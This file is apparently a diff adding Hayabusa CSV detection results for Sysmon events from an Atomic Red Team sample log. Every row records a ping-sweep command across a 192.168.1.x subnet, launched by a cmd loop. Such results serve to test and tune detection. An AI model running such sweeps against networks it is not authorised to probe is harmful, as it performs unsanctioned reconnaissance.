+2019-07-19 23:51:51.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.33 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1992 | PGUID: 747F3D96-D907-5D31-0000-001013543400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:51.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.34 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4788 | PGUID: 747F3D96-D907-5D31-0000-0010DA5C3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:52.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.35 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3212 | PGUID: 747F3D96-D908-5D31-0000-0010C45F3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:52.448 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.36 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2552 | PGUID: 747F3D96-D908-5D31-0000-0010B2623400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:53.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.37 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2932 | PGUID: 747F3D96-D909-5D31-0000-00109E653400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:53.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.38 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6616 | PGUID: 747F3D96-D909-5D31-0000-001088683400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:54.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.39 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4312 | PGUID: 747F3D96-D90A-5D31-0000-0010726B3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:54.581 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.40 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3684 | PGUID: 747F3D96-D90A-5D31-0000-00105C6E3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:55.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.41 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 796 | PGUID: 747F3D96-D90B-5D31-0000-001046713400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:55.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.42 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D90B-5D31-0000-001031743400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:56.049 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.43 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4660 | PGUID: 747F3D96-D90C-5D31-0000-00102E773400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:56.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.44 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1360 | PGUID: 747F3D96-D90C-5D31-0000-0010F37F3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:57.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.45 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5060 | PGUID: 747F3D96-D90D-5D31-0000-0010DD823400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:57.558 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.46 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4708 | PGUID: 747F3D96-D90D-5D31-0000-0010D6853400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:58.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.47 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4624 | PGUID: 747F3D96-D90E-5D31-0000-0010D4883400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:58.457 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.48 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7032 | PGUID: 747F3D96-D90E-5D31-0000-0010C18B3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:59.001 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.49 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3560 | PGUID: 747F3D96-D90E-5D31-0000-0010B58E3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:59.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.50 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5224 | PGUID: 747F3D96-D90F-5D31-0000-00109F913400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:00.063 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.51 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4380 | PGUID: 747F3D96-D910-5D31-0000-001050953400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:00.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.52 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4544 | PGUID: 747F3D96-D910-5D31-0000-00108F983400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:00.940 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.53 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4260 | PGUID: 747F3D96-D910-5D31-0000-0010BFA43400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:01.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.54 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3872 | PGUID: 747F3D96-D911-5D31-0000-001087AD3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:02.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.55 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1256 | PGUID: 747F3D96-D912-5D31-0000-001072B03400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:02.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.56 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5656 | PGUID: 747F3D96-D912-5D31-0000-00105CB33400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:03.059 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.57 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4792 | PGUID: 747F3D96-D913-5D31-0000-00105AB63400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:03.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.58 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5676 | PGUID: 747F3D96-D913-5D31-0000-001044B93400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:04.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.59 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5968 | PGUID: 747F3D96-D914-5D31-0000-001030BC3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:04.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.60 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7156 | PGUID: 747F3D96-D914-5D31-0000-00102DBF3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:05.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.61 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4172 | PGUID: 747F3D96-D915-5D31-0000-001017C23400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:05.516 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.62 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D915-5D31-0000-001002C53400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:06.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.63 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 680 | PGUID: 747F3D96-D916-5D31-0000-0010ECC73400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:06.440 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.64 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D916-5D31-0000-0010B1D03400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:07.053 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.65 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5468 | PGUID: 747F3D96-D917-5D31-0000-00109BD33400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:07.413 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.66 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4052 | PGUID: 747F3D96-D917-5D31-0000-001085D63400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:08.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.67 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D918-5D31-0000-00106FD93400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:08.500 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.68 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-D918-5D31-0000-001059DC3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:09.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.69 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-D919-5D31-0000-00109EDF3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:09.474 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.70 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D919-5D31-0000-001088E23400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:10.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.71 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1200 | PGUID: 747F3D96-D91A-5D31-0000-001072E53400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:10.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.72 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4664 | PGUID: 747F3D96-D91A-5D31-0000-00105CE83400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:11.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.73 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2804 | PGUID: 747F3D96-D91B-5D31-0000-001046EB3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:11.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.74 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D91B-5D31-0000-00100BF43400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:12.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.75 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6080 | PGUID: 747F3D96-D91C-5D31-0000-0010F5F63400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:12.547 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.76 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6308 | PGUID: 747F3D96-D91C-5D31-0000-0010DFF93400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:13.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.77 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5692 | PGUID: 747F3D96-D91D-5D31-0000-0010CAFC3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
